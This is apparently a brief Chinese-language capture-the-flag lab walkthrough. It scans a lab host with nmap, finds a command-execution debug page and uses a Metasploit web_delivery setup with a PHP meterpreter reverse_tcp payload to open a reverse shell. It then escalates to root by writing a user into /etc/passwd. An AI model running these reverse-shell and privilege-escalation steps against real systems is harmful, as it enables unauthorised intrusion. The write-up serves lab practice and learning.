看下端口

nmap  -A 172.16.61.131

一些坑3306无法访问,80,web2py漏洞无法利用

利用dirb遍历网站路径

得到下面命令执行漏洞

http://172.16.61.131:8080/debug/

这里卡住了,shell一直反弹不出来,goole了一下上msf用

use multi/script/web_delivery
set target 1
set payload php/meterpreter/reverse_tcp
set lhost 172.16.61.1
run

复制下面,扔到debug页面运行,成功反弹shell

提权

切换shell进入,查看suid能否提权

切换为brexit用户,写入/etc/passwd用户获取root权限

获取flag

最新文章

  1. Android使用Application的好处
  2. SQL SERVER四舍五入你除了用ROUND还有其他方法吗?
  3. 《ARC以及非ARC的讨论》
  4. NSString和NSMutableString常用方法+NSArray常用代码 (转)
  5. iOS常用第三方库
  6. javascript的模块化解读
  7. Fragement
  8. Java Date与SimpleDateFormat
  9. 转:Hprose for php(二)——服务器
  10. Android SQLite总结
  11. php析构方法
  12. 在服务器上实现SSH(Single Stage Headless)
  13. HTTPS 到底加密了什么?
  14. Laravel用post提交表单常见的两个错误
  15. MySQL安装的挫折之路
  16. 错误不能中断(不许因错误或异常而产生阻断性Bug)
  17. 【收藏】UI自动化测试基本规则与设计模式
  18. 浮动元素垂直居中,bootstrap栅格布局垂直居中
  19. linux内核分析第八周-理解进程调度时机跟踪分析进程调度与进程切换的过程
  20. C# 鼠标穿透窗体与恢复

热门文章

  1. Spring Cloud Alibaba系列(一)nacos作为服务注册中心
  2. Oracle创建包
  3. 软件工程复习 WHUT
  4. Web前端基础第一天
  5. matlab读取csv文件并显示
  6. hadoop文件系统常用操作
  7. python --函数学习之全局变量和局部变量
  8. Linux --remote (ssh and VNC)
  9. docker push的时候提示requested access to the resource is denied
  10. Analysis分析器